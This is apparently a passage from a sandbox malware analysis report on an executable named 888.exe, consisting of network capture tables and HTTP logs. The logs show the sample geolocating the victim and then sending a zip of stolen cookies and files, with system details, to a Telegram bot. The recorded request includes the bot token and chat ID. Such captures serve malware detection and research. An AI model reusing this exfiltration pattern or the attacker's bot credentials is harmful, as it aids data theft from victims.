                                                                      api-ms-win-crt-runtime-l1-1-0.dll_initterm, _crt_atexit, _initterm_e, exit, _configure_narrow_argv, _controlfp_s, _set_app_type, abort, __p___argc, _seh_filter_exe, _endthreadex, __p___argv, _cexit, _beginthreadex, _register_onexit_function, _c_exit, _register_thread_local_exe_atexit_callback, terminate, _get_initial_narrow_environment, _initialize_onexit_table, _exit, _initialize_narrow_environment
                                                                      api-ms-win-crt-stdio-l1-1-0.dll__p__commode, _set_fmode
                                                                      api-ms-win-crt-locale-l1-1-0.dll_configthreadlocale

                                                                      Network Behavior

                                                                      Network Port Distribution

                                                                      TCP Packets

                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                      Dec 13, 2024 12:40:16.915498018 CET4970880192.168.2.10108.181.61.49
                                                                      Dec 13, 2024 12:40:17.035352945 CET8049708108.181.61.49192.168.2.10
                                                                      Dec 13, 2024 12:40:17.035475016 CET4970880192.168.2.10108.181.61.49
                                                                      Dec 13, 2024 12:40:17.036777973 CET4970880192.168.2.10108.181.61.49
                                                                      Dec 13, 2024 12:40:17.156992912 CET8049708108.181.61.49192.168.2.10
                                                                      Dec 13, 2024 12:40:18.707910061 CET8049708108.181.61.49192.168.2.10
                                                                      Dec 13, 2024 12:40:18.714674950 CET4970880192.168.2.10108.181.61.49
                                                                      Dec 13, 2024 12:40:18.834839106 CET8049708108.181.61.49192.168.2.10
                                                                      Dec 13, 2024 12:40:18.834912062 CET4970880192.168.2.10108.181.61.49
                                                                      Dec 13, 2024 12:40:53.858319998 CET4979680192.168.2.10108.181.61.49
                                                                      Dec 13, 2024 12:40:53.978290081 CET8049796108.181.61.49192.168.2.10
                                                                      Dec 13, 2024 12:40:53.978374004 CET4979680192.168.2.10108.181.61.49
                                                                      Dec 13, 2024 12:40:53.978924990 CET4979680192.168.2.10108.181.61.49
                                                                      Dec 13, 2024 12:40:54.099622011 CET8049796108.181.61.49192.168.2.10
                                                                      Dec 13, 2024 12:40:55.642307997 CET8049796108.181.61.49192.168.2.10
                                                                      Dec 13, 2024 12:40:55.648334980 CET4979680192.168.2.10108.181.61.49
                                                                      Dec 13, 2024 12:40:55.768578053 CET8049796108.181.61.49192.168.2.10
                                                                      Dec 13, 2024 12:40:55.768655062 CET4979680192.168.2.10108.181.61.49
                                                                      Dec 13, 2024 12:41:05.257632971 CET49825443192.168.2.10149.154.167.220
                                                                      Dec 13, 2024 12:41:05.257678986 CET44349825149.154.167.220192.168.2.10
                                                                      Dec 13, 2024 12:41:05.257850885 CET49825443192.168.2.10149.154.167.220
                                                                      Dec 13, 2024 12:41:05.414583921 CET49825443192.168.2.10149.154.167.220
                                                                      Dec 13, 2024 12:41:05.414599895 CET44349825149.154.167.220192.168.2.10
                                                                      Dec 13, 2024 12:41:06.781860113 CET44349825149.154.167.220192.168.2.10
                                                                      Dec 13, 2024 12:41:06.781975031 CET49825443192.168.2.10149.154.167.220
                                                                      Dec 13, 2024 12:41:06.785275936 CET49825443192.168.2.10149.154.167.220
                                                                      Dec 13, 2024 12:41:06.785284042 CET44349825149.154.167.220192.168.2.10
                                                                      Dec 13, 2024 12:41:06.785542011 CET44349825149.154.167.220192.168.2.10
                                                                      Dec 13, 2024 12:41:06.825799942 CET49825443192.168.2.10149.154.167.220
                                                                      Dec 13, 2024 12:41:06.872076035 CET49825443192.168.2.10149.154.167.220
                                                                      Dec 13, 2024 12:41:06.872145891 CET44349825149.154.167.220192.168.2.10
                                                                      Dec 13, 2024 12:41:06.872278929 CET49825443192.168.2.10149.154.167.220
                                                                      Dec 13, 2024 12:41:06.872313023 CET44349825149.154.167.220192.168.2.10
                                                                      Dec 13, 2024 12:41:06.872390032 CET49825443192.168.2.10149.154.167.220
                                                                      Dec 13, 2024 12:41:06.872415066 CET44349825149.154.167.220192.168.2.10
                                                                      Dec 13, 2024 12:41:06.872430086 CET49825443192.168.2.10149.154.167.220
                                                                      Dec 13, 2024 12:41:06.872518063 CET49825443192.168.2.10149.154.167.220
                                                                      Dec 13, 2024 12:41:06.872538090 CET49825443192.168.2.10149.154.167.220
                                                                      Dec 13, 2024 12:41:06.872540951 CET44349825149.154.167.220192.168.2.10
                                                                      Dec 13, 2024 12:41:06.872559071 CET44349825149.154.167.220192.168.2.10
                                                                      Dec 13, 2024 12:41:06.872582912 CET49825443192.168.2.10149.154.167.220
                                                                      Dec 13, 2024 12:41:06.872606993 CET44349825149.154.167.220192.168.2.10
                                                                      Dec 13, 2024 12:41:06.872612953 CET49825443192.168.2.10149.154.167.220
                                                                      Dec 13, 2024 12:41:06.872627020 CET44349825149.154.167.220192.168.2.10
                                                                      Dec 13, 2024 12:41:06.872675896 CET49825443192.168.2.10149.154.167.220
                                                                      Dec 13, 2024 12:41:06.872684002 CET44349825149.154.167.220192.168.2.10
                                                                      Dec 13, 2024 12:41:06.872700930 CET49825443192.168.2.10149.154.167.220
                                                                      Dec 13, 2024 12:41:06.872714996 CET44349825149.154.167.220192.168.2.10
                                                                      Dec 13, 2024 12:41:06.872807026 CET49825443192.168.2.10149.154.167.220
                                                                      Dec 13, 2024 12:41:06.872813940 CET44349825149.154.167.220192.168.2.10
                                                                      Dec 13, 2024 12:41:06.872828960 CET49825443192.168.2.10149.154.167.220
                                                                      Dec 13, 2024 12:41:06.872838974 CET44349825149.154.167.220192.168.2.10
                                                                      Dec 13, 2024 12:41:06.872853041 CET49825443192.168.2.10149.154.167.220
                                                                      Dec 13, 2024 12:41:06.872859001 CET44349825149.154.167.220192.168.2.10
                                                                      Dec 13, 2024 12:41:06.872869015 CET49825443192.168.2.10149.154.167.220
                                                                      Dec 13, 2024 12:41:06.872876883 CET44349825149.154.167.220192.168.2.10
                                                                      Dec 13, 2024 12:41:06.872889042 CET49825443192.168.2.10149.154.167.220
                                                                      Dec 13, 2024 12:41:06.872895956 CET44349825149.154.167.220192.168.2.10
                                                                      Dec 13, 2024 12:41:06.872903109 CET49825443192.168.2.10149.154.167.220
                                                                      Dec 13, 2024 12:41:06.872906923 CET44349825149.154.167.220192.168.2.10
                                                                      Dec 13, 2024 12:41:06.872917891 CET49825443192.168.2.10149.154.167.220
                                                                      Dec 13, 2024 12:41:06.872921944 CET44349825149.154.167.220192.168.2.10
                                                                      Dec 13, 2024 12:41:06.872932911 CET49825443192.168.2.10149.154.167.220
                                                                      Dec 13, 2024 12:41:06.872944117 CET44349825149.154.167.220192.168.2.10
                                                                      Dec 13, 2024 12:41:06.872958899 CET49825443192.168.2.10149.154.167.220
                                                                      Dec 13, 2024 12:41:06.872971058 CET44349825149.154.167.220192.168.2.10
                                                                      Dec 13, 2024 12:41:06.872989893 CET49825443192.168.2.10149.154.167.220
                                                                      Dec 13, 2024 12:41:06.873003960 CET49825443192.168.2.10149.154.167.220
                                                                      Dec 13, 2024 12:41:06.873011112 CET49825443192.168.2.10149.154.167.220
                                                                      Dec 13, 2024 12:41:06.873017073 CET49825443192.168.2.10149.154.167.220
                                                                      Dec 13, 2024 12:41:06.873049021 CET49825443192.168.2.10149.154.167.220
                                                                      Dec 13, 2024 12:41:06.873090982 CET49825443192.168.2.10149.154.167.220
                                                                      Dec 13, 2024 12:41:06.873117924 CET49825443192.168.2.10149.154.167.220
                                                                      Dec 13, 2024 12:41:06.873198986 CET49825443192.168.2.10149.154.167.220
                                                                      Dec 13, 2024 12:41:06.873214006 CET49825443192.168.2.10149.154.167.220
                                                                      Dec 13, 2024 12:41:06.919328928 CET44349825149.154.167.220192.168.2.10
                                                                      Dec 13, 2024 12:41:06.919508934 CET49825443192.168.2.10149.154.167.220
                                                                      Dec 13, 2024 12:41:06.919601917 CET49825443192.168.2.10149.154.167.220
                                                                      Dec 13, 2024 12:41:06.919610023 CET49825443192.168.2.10149.154.167.220
                                                                      Dec 13, 2024 12:41:06.919629097 CET49825443192.168.2.10149.154.167.220
                                                                      Dec 13, 2024 12:41:06.919650078 CET49825443192.168.2.10149.154.167.220
                                                                      Dec 13, 2024 12:41:06.919682980 CET49825443192.168.2.10149.154.167.220
                                                                      Dec 13, 2024 12:41:06.919718981 CET49825443192.168.2.10149.154.167.220
                                                                      Dec 13, 2024 12:41:06.919740915 CET49825443192.168.2.10149.154.167.220
                                                                      Dec 13, 2024 12:41:06.919759035 CET49825443192.168.2.10149.154.167.220
                                                                      Dec 13, 2024 12:41:06.963323116 CET44349825149.154.167.220192.168.2.10
                                                                      Dec 13, 2024 12:41:06.967273951 CET49825443192.168.2.10149.154.167.220
                                                                      Dec 13, 2024 12:41:06.967328072 CET49825443192.168.2.10149.154.167.220
                                                                      Dec 13, 2024 12:41:06.967343092 CET49825443192.168.2.10149.154.167.220
                                                                      Dec 13, 2024 12:41:06.967365980 CET49825443192.168.2.10149.154.167.220
                                                                      Dec 13, 2024 12:41:06.967375040 CET49825443192.168.2.10149.154.167.220
                                                                      Dec 13, 2024 12:41:06.967407942 CET49825443192.168.2.10149.154.167.220
                                                                      Dec 13, 2024 12:41:06.967421055 CET49825443192.168.2.10149.154.167.220
                                                                      Dec 13, 2024 12:41:06.967428923 CET49825443192.168.2.10149.154.167.220
                                                                      Dec 13, 2024 12:41:06.967439890 CET49825443192.168.2.10149.154.167.220
                                                                      Dec 13, 2024 12:41:06.967463970 CET49825443192.168.2.10149.154.167.220
                                                                      Dec 13, 2024 12:41:07.011327982 CET44349825149.154.167.220192.168.2.10
                                                                      Dec 13, 2024 12:41:07.011521101 CET49825443192.168.2.10149.154.167.220
                                                                      Dec 13, 2024 12:41:07.011554003 CET49825443192.168.2.10149.154.167.220
                                                                      Dec 13, 2024 12:41:07.011677027 CET49825443192.168.2.10149.154.167.220
                                                                      Dec 13, 2024 12:41:07.011708021 CET49825443192.168.2.10149.154.167.220
                                                                      Dec 13, 2024 12:41:07.011744022 CET49825443192.168.2.10149.154.167.220
                                                                      Dec 13, 2024 12:41:07.011771917 CET49825443192.168.2.10149.154.167.220
                                                                      Dec 13, 2024 12:41:07.011780024 CET49825443192.168.2.10149.154.167.220
                                                                      Dec 13, 2024 12:41:07.015983105 CET44349825149.154.167.220192.168.2.10
                                                                      Dec 13, 2024 12:41:07.016130924 CET44349825149.154.167.220192.168.2.10
                                                                      Dec 13, 2024 12:41:07.016233921 CET49825443192.168.2.10149.154.167.220
                                                                      Dec 13, 2024 12:41:07.016762018 CET49825443192.168.2.10149.154.167.220
                                                                      Dec 13, 2024 12:41:07.016807079 CET49825443192.168.2.10149.154.167.220
                                                                      Dec 13, 2024 12:41:07.016841888 CET49825443192.168.2.10149.154.167.220
                                                                      Dec 13, 2024 12:41:07.016854048 CET49825443192.168.2.10149.154.167.220
                                                                      Dec 13, 2024 12:41:07.063328981 CET44349825149.154.167.220192.168.2.10
                                                                      Dec 13, 2024 12:41:07.112811089 CET44349825149.154.167.220192.168.2.10
                                                                      Dec 13, 2024 12:41:07.114501953 CET49825443192.168.2.10149.154.167.220
                                                                      Dec 13, 2024 12:41:07.114523888 CET44349825149.154.167.220192.168.2.10
                                                                      Dec 13, 2024 12:41:07.232933998 CET44349825149.154.167.220192.168.2.10
                                                                      Dec 13, 2024 12:41:07.353765965 CET44349825149.154.167.220192.168.2.10
                                                                      Dec 13, 2024 12:41:09.857706070 CET44349825149.154.167.220192.168.2.10
                                                                      Dec 13, 2024 12:41:09.857876062 CET44349825149.154.167.220192.168.2.10
                                                                      Dec 13, 2024 12:41:09.858275890 CET49825443192.168.2.10149.154.167.220
                                                                      Dec 13, 2024 12:41:09.860017061 CET49825443192.168.2.10149.154.167.220
                                                                      Dec 13, 2024 12:41:09.860033989 CET44349825149.154.167.220192.168.2.10

                                                                      UDP Packets

                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                      Dec 13, 2024 12:40:16.757639885 CET6539053192.168.2.101.1.1.1
                                                                      Dec 13, 2024 12:40:16.895631075 CET53653901.1.1.1192.168.2.10
                                                                      Dec 13, 2024 12:40:53.719352007 CET5436053192.168.2.101.1.1.1
                                                                      Dec 13, 2024 12:40:53.857197046 CET53543601.1.1.1192.168.2.10
                                                                      Dec 13, 2024 12:41:05.055191994 CET5054753192.168.2.101.1.1.1
                                                                      Dec 13, 2024 12:41:05.192477942 CET53505471.1.1.1192.168.2.10

                                                                      DNS Queries

                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                      Dec 13, 2024 12:40:16.757639885 CET192.168.2.101.1.1.10x42efStandard query (0)ipwho.isA (IP address)IN (0x0001)false
                                                                      Dec 13, 2024 12:40:53.719352007 CET192.168.2.101.1.1.10x7b0fStandard query (0)ipwho.isA (IP address)IN (0x0001)false
                                                                      Dec 13, 2024 12:41:05.055191994 CET192.168.2.101.1.1.10x2b0Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false

                                                                      DNS Answers

                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                      Dec 13, 2024 12:40:14.065551043 CET1.1.1.1192.168.2.100x8ab3No error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                      Dec 13, 2024 12:40:14.065551043 CET1.1.1.1192.168.2.100x8ab3No error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false
                                                                      Dec 13, 2024 12:40:16.895631075 CET1.1.1.1192.168.2.100x42efNo error (0)ipwho.is108.181.61.49A (IP address)IN (0x0001)false
                                                                      Dec 13, 2024 12:40:53.857197046 CET1.1.1.1192.168.2.100x7b0fNo error (0)ipwho.is108.181.61.49A (IP address)IN (0x0001)false
                                                                      Dec 13, 2024 12:41:05.192477942 CET1.1.1.1192.168.2.100x2b0No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false

                                                                      HTTP Request Dependency Graph

                                                                      • api.telegram.org
                                                                      • ipwho.is

                                                                      HTTP Packets

                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      0192.168.2.1049708108.181.61.49807888C:\Users\user\Desktop\888.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Dec 13, 2024 12:40:17.036777973 CET59OUTGET /?output=json HTTP/1.1
                                                                      accept: */*
                                                                      host: ipwho.is
                                                                      Dec 13, 2024 12:40:18.707910061 CET943INHTTP/1.1 200 OK
                                                                      Date: Fri, 13 Dec 2024 11:40:18 GMT
                                                                      Content-Type: application/json; charset=utf-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Server: ipwhois
                                                                      Access-Control-Allow-Headers: *
                                                                      X-Robots-Tag: noindex
                                                                      Data Raw: 32 62 66 0d 0a 7b 22 69 70 22 3a 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 22 73 75 63 63 65 73 73 22 3a 74 72 75 65 2c 22 74 79 70 65 22 3a 22 49 50 76 34 22 2c 22 63 6f 6e 74 69 6e 65 6e 74 22 3a 22 4e 6f 72 74 68 20 41 6d 65 72 69 63 61 22 2c 22 63 6f 6e 74 69 6e 65 6e 74 5f 63 6f 64 65 22 3a 22 4e 41 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 22 55 53 22 2c 22 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 72 65 67 69 6f 6e 5f 63 6f 64 65 22 3a 22 4e 59 22 2c 22 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 6c 61 74 69 74 75 64 65 22 3a 34 30 2e 37 31 32 37 38 33 37 2c 22 6c 6f 6e 67 69 74 75 64 65 22 3a 2d 37 34 2e 30 30 35 39 34 31 33 2c 22 69 73 5f 65 75 22 3a 66 61 6c 73 65 2c 22 70 6f 73 74 61 6c 22 3a 22 31 30 30 30 30 22 2c 22 63 61 6c 6c 69 6e 67 5f 63 6f 64 65 22 3a 22 31 22 2c 22 63 61 70 69 74 61 6c 22 3a 22 57 61 73 68 69 6e 67 74 6f 6e 20 44 2e 43 2e 22 2c 22 62 6f 72 64 65 [TRUNCATED]
                                                                      Data Ascii: 2bf{"ip":"8.46.123.189","success":true,"type":"IPv4","continent":"North America","continent_code":"NA","country":"United States","country_code":"US","region":"New York","region_code":"NY","city":"New York","latitude":40.7127837,"longitude":-74.0059413,"is_eu":false,"postal":"10000","calling_code":"1","capital":"Washington D.C.","borders":"CA,MX","flag":{"img":"https:\/\/cdn.ipwhois.io\/flags\/us.svg","emoji":"\ud83c\uddfa\ud83c\uddf8","emoji_unicode":"U+1F1FA U+1F1F8"},"connection":{"asn":3356,"org":"CenturyLink Communications, LLC","isp":"Level","domain":""},"timezone":{"id":"America\/New_York","abbr":"EST","is_dst":false,"offset":-18000,"utc":"-05:00","current_time":"2024-12-13T06:40:18-05:00"}}0


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      1192.168.2.1049796108.181.61.49807888C:\Users\user\Desktop\888.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Dec 13, 2024 12:40:53.978924990 CET59OUTGET /?output=json HTTP/1.1
                                                                      accept: */*
                                                                      host: ipwho.is
                                                                      Dec 13, 2024 12:40:55.642307997 CET943INHTTP/1.1 200 OK
                                                                      Date: Fri, 13 Dec 2024 11:40:55 GMT
                                                                      Content-Type: application/json; charset=utf-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Server: ipwhois
                                                                      Access-Control-Allow-Headers: *
                                                                      X-Robots-Tag: noindex
                                                                      Data Raw: 32 62 66 0d 0a 7b 22 69 70 22 3a 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 22 73 75 63 63 65 73 73 22 3a 74 72 75 65 2c 22 74 79 70 65 22 3a 22 49 50 76 34 22 2c 22 63 6f 6e 74 69 6e 65 6e 74 22 3a 22 4e 6f 72 74 68 20 41 6d 65 72 69 63 61 22 2c 22 63 6f 6e 74 69 6e 65 6e 74 5f 63 6f 64 65 22 3a 22 4e 41 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 22 55 53 22 2c 22 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 72 65 67 69 6f 6e 5f 63 6f 64 65 22 3a 22 4e 59 22 2c 22 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 6c 61 74 69 74 75 64 65 22 3a 34 30 2e 37 31 32 37 38 33 37 2c 22 6c 6f 6e 67 69 74 75 64 65 22 3a 2d 37 34 2e 30 30 35 39 34 31 33 2c 22 69 73 5f 65 75 22 3a 66 61 6c 73 65 2c 22 70 6f 73 74 61 6c 22 3a 22 31 30 30 30 30 22 2c 22 63 61 6c 6c 69 6e 67 5f 63 6f 64 65 22 3a 22 31 22 2c 22 63 61 70 69 74 61 6c 22 3a 22 57 61 73 68 69 6e 67 74 6f 6e 20 44 2e 43 2e 22 2c 22 62 6f 72 64 65 [TRUNCATED]
                                                                      Data Ascii: 2bf{"ip":"8.46.123.189","success":true,"type":"IPv4","continent":"North America","continent_code":"NA","country":"United States","country_code":"US","region":"New York","region_code":"NY","city":"New York","latitude":40.7127837,"longitude":-74.0059413,"is_eu":false,"postal":"10000","calling_code":"1","capital":"Washington D.C.","borders":"CA,MX","flag":{"img":"https:\/\/cdn.ipwhois.io\/flags\/us.svg","emoji":"\ud83c\uddfa\ud83c\uddf8","emoji_unicode":"U+1F1FA U+1F1F8"},"connection":{"asn":3356,"org":"CenturyLink Communications, LLC","isp":"Level","domain":""},"timezone":{"id":"America\/New_York","abbr":"EST","is_dst":false,"offset":-18000,"utc":"-05:00","current_time":"2024-12-13T06:40:55-05:00"}}0


                                                                      HTTPS Proxied Packets

                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      0192.168.2.1049825149.154.167.2204437888C:\Users\user\Desktop\888.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-12-13 11:41:06 UTC1272OUTPOST /bot6144496200:AAG-IIb4TPBPT1INBnZWa7iLZBVaG67I2mE/sendDocument?chat_id=-1001562112668&caption=%3Ccode%3E%0A-%20IP%20Info%20-%0A%0AIP:%208.46.123.189%0ACountry:%20United%20States%0ACity:%20New%20York%0APostal:%2010000%0AISP:%20Level%20-%20A3356%0ATimezone:%20-05:00%0A%0A-%20PC%20Info%20-%0A%0AUsername:%20user%0AOS:%20Microsoft%20Windows%2010%20Pro%0ACPU:%20Intel(R)%20Core(TM)2%20CPU%206600%20@%202.40%20GHz%0AGPU:%20PGFKD3%20(1280,%201024)%0AHWID:%205146949416814903%0ACurrent%20Language:%20English%20(United%20States)%0AFileLocation:%20C:\Users\user\Desktop\888.exe%0AIs%20Elevated:%20true%0A%0A-%20Other%20Info%20-%0A%0AAntivirus:%20%0A%20%20%20%20-%20Windows%20Defender%0A%0A-%20Log%20Info%20-%0A%0ABuild:_____%0A%0APasswords:%20%E2%9D%8C%0ACookies:%20%E2%9C%85%202%0AWallets:%20%E2%9D%8C%0AFiles:%20%E2%9C%85%2020%0ACredit%20Cards:%20%E2%9D%8C%0AServers%20FTP/SSH:%20%E2%9D%8C%0ADiscord%20Tokens:%20%E2%9D%8C%0ATelegram:%20%E2%9D%8C%0A%0ATagged%20URLs:%20%E2%9D%8C%0ATagged%20Cookies:%20%E2%9D%8C%0A%0ATags%20Pas [TRUNCATED]
                                                                      content-type: multipart/form-data; boundary=2d88adf10cbad28c-2759270d23c57240-8cf43d1437ebaac5-72f0b48001fd812a
                                                                      content-length: 889952
                                                                      accept: */*
                                                                      host: api.telegram.org
                                                                      2024-12-13 11:41:06 UTC15112OUTData Raw: 2d 2d 32 64 38 38 61 64 66 31 30 63 62 61 64 32 38 63 2d 32 37 35 39 32 37 30 64 32 33 63 35 37 32 34 30 2d 38 63 66 34 33 64 31 34 33 37 65 62 61 61 63 35 2d 37 32 66 30 62 34 38 30 30 31 66 64 38 31 32 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 5b 55 53 5d 5f 38 2e 34 36 2e 31 32 33 2e 31 38 39 5f 42 52 4f 4b 2d 50 43 2e 7a 69 70 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 7a 69 70 0d 0a 0d 0a 50 4b 03 04 14 00 00 00 00 00 4c 6b 8d 59 00 00 00 00 00 00 00 00 00 00 00 00 09 00 00 00 41 75 74 6f 66 69 6c 6c 2f 50 4b 03 04 14 00 00 00 00 00 4c 6b 8d 59 00 00 00 00 00 00 00
                                                                      Data Ascii: --2d88adf10cbad28c-2759270d23c57240-8cf43d1437ebaac5-72f0b48001fd812aContent-Disposition: form-data; name="document"; filename="[US]_8.46.123.189_user-PC.zip"Content-Type: application/zipPKLkYAutofill/PKLkY
                                                                      2024-12-13 11:41:06 UTC16384OUTData Raw: 92 b0 4d 6b 8d 52 0a e3 38 22 89 c5 62 81 6d c6 71 24 22 90 84 6d 32 13 db 44 04 11 41 66 32 4d 13 35 02 49 00 48 02 c0 36 00 b6 b1 4d 44 50 6b 65 1c 47 00 ba ae 63 9a 26 32 93 50 45 12 11 01 40 6b 8d d6 1a 00 a5 14 6a ad 4c d3 84 6d 24 61 9b d6 1a 00 a5 14 24 71 3f 49 00 64 26 00 92 a8 b5 92 99 64 26 99 c9 fd 24 01 60 9b 88 40 12 b6 b1 0d 80 24 24 61 9b cc 24 24 22 82 cc 64 1c 47 24 d1 75 1d 99 89 24 5a 6b 44 04 b6 69 ad 51 6b 45 12 b6 69 ad 91 99 94 52 28 a5 00 60 1b 00 19 32 13 db 00 44 04 92 c8 4c 32 93 5a 2b f7 b3 4d 66 02 10 11 48 62 9a 26 22 82 88 40 12 00 b6 01 90 84 6d 5a 6b d8 26 22 88 08 1e 68 18 06 ba ae 63 9a 26 9c 49 ed 3a 32 93 cc 64 36 9b 31 8e 23 f7 93 84 24 00 6c 93 99 cc 6a 47 66 62 1b db 44 04 f7 b3 8d 6d 24 21 89 88 00 c0 36 ad 35 32
                                                                      Data Ascii: MkR8"bmq$"m2DAf2M5IH6MDPkeGc&2PE@kjLm$a$q?Id&d&$`@$$a$$"dG$u$ZkDiQkEiR(`2DL2Z+MfHb&"@mZk&"hc&I:2d61#$ljGfbDm$!652
                                                                      2024-12-13 11:41:06 UTC16384OUTData Raw: 9a 97 3c ce b3 fc c1 ed fb bc c1 ef cd f9 9f e8 d8 d3 df 8a 17 e6 d8 7c 8b bf fd b8 1f 62 67 be c9 fd 5e f3 1b 3f 90 bf bb fb 29 bc 30 f7 7d e6 af 00 70 cd e7 be 11 cf ed be cf fc 15 1e f5 23 1f ce 73 7b e2 3b 7d 3d f7 fb ac cf f8 54 be f8 e1 9f c1 03 d9 e6 df 23 78 e1 6c f3 9f 49 e6 85 92 84 6d 1e c8 36 ff 55 6c f3 c2 c8 fc a7 b2 cd 0b 13 e6 45 26 09 db 00 d8 c6 36 92 f8 f7 90 83 17 c6 36 ff 99 6c f3 c2 04 2f 1a db d8 e6 7e 11 81 24 32 93 17 46 e6 45 66 9b ff 08 92 78 96 34 0f 64 9b e7 27 cc 65 b6 f9 8f 64 9b 17 46 fc fb d8 e6 85 4b fe 2d 24 01 a0 89 ff 10 b6 79 51 d8 e6 5f 43 bc 70 b6 f9 f7 50 9a 7f 97 34 ff 11 6c 63 1b 00 49 fc 6b 85 79 16 db 3c 37 f1 6f 63 9b 17 46 e6 59 6c f3 2f b1 cd 8b 22 cc 8b 44 bc 70 b6 01 90 c4 fd 6c 03 60 1b 49 00 d8 e6 81 6c
                                                                      Data Ascii: <|bg^?)0}p#s{;}=T#xlIm6UlE&66l/~$2FEfx4d'edFK-$yQ_CpP4lcIky<7ocFYl/"Dpl`Il
                                                                      2024-12-13 11:41:06 UTC16384OUTData Raw: 0e b6 79 20 99 17 ca e2 f9 92 79 be 6c f3 2f b1 cd 03 49 e2 f9 b1 8d 0c 92 00 b0 8d 6d ee 27 09 32 01 90 84 24 00 6c 63 1b db 14 05 00 b6 01 b0 8d 24 ee 97 99 48 02 40 12 00 b6 01 b0 8d 4a 20 09 19 6c 63 1b db 3c 90 6d c2 20 09 49 48 c2 36 b6 11 2f 9c 6d 24 01 60 1b 00 db 44 04 92 18 86 01 45 10 11 48 02 c0 36 b6 01 88 08 5a 6b d8 26 22 90 84 6d 6c 03 d0 45 87 6d 32 13 db 00 44 04 92 00 c8 4c 24 91 99 d8 06 40 12 00 b6 91 8c 24 ee 67 1b db 00 48 42 69 00 22 02 49 d8 26 33 01 88 08 70 23 22 00 c8 4c 6c 03 20 09 db 44 04 cf 8f 6d 6c 23 0a 99 49 66 22 09 49 48 c2 36 b6 91 84 6d 00 22 02 00 db d8 06 20 78 c1 6c 13 11 dc cf 36 b6 b1 cd fd 8a 2a f7 93 84 24 32 13 db 00 44 04 0f 64 9b fb 49 82 34 00 b6 c9 4c 32 13 00 49 48 e2 b9 49 e2 7e 99 09 80 24 22 02 00 db
                                                                      Data Ascii: y yl/Im'2$lc$H@J lc<m IH6/m$`DEH6Zk&"mlEm2DL$@$gHBi"I&3p#"Ll Dml#If"IH6m" xl6*$2DdI4L2IHI~$"
                                                                      2024-12-13 11:41:06 UTC16384OUTData Raw: 6d fe 33 c9 60 9b fb 49 e2 5f 62 9b ff 68 b6 79 20 49 00 d8 e6 85 91 f9 77 b1 cd bf 47 98 17 99 6d fe a3 89 67 b3 cd 7f 16 db 3c 3f e1 e0 f9 b1 cd fd 24 f1 fc d8 e6 df 4b e6 5f c5 36 ff 1a 32 d8 e6 81 24 61 9b ff 08 61 2e 93 84 6d 6c f3 5f 49 5c 61 9b 07 b2 cd bf 95 6d ee 27 89 fb d9 e6 b9 95 e4 df c5 36 2f 8c 78 e1 6c f3 dc 6c f3 6f 65 9b 7f 8d 30 ff 3e 29 9e 9b 6d ee 27 89 17 26 9a 01 90 84 6d 6c f3 ef 65 9b 17 95 78 fe 6c f3 a2 50 36 24 71 3f db fc 6b 88 7f 99 6d 5e 10 f3 9c c4 0b 17 e6 39 d8 02 c0 36 92 78 20 db dc cf 36 0f 24 09 00 39 b9 9f 6d 1e c8 36 92 00 b0 cd f3 23 f3 22 b3 cd 73 4b 0c 80 24 9e 1f 49 d8 e6 b9 d9 06 9b 2e 0a 00 b6 c9 4c 6c 03 10 08 49 dc cf 36 00 92 b8 9f 6d 08 61 1b 99 67 91 84 6d ee 67 9b 30 d8 06 40 12 92 90 84 33 01 b0 cd 73
                                                                      Data Ascii: m3`I_bhy IwGmg<?$K_62$aa.ml_I\am'6/xlloe0>)m'&mlexlP6$q?km^96x 6$9m6#"sK$I.LlI6magmg0@3s
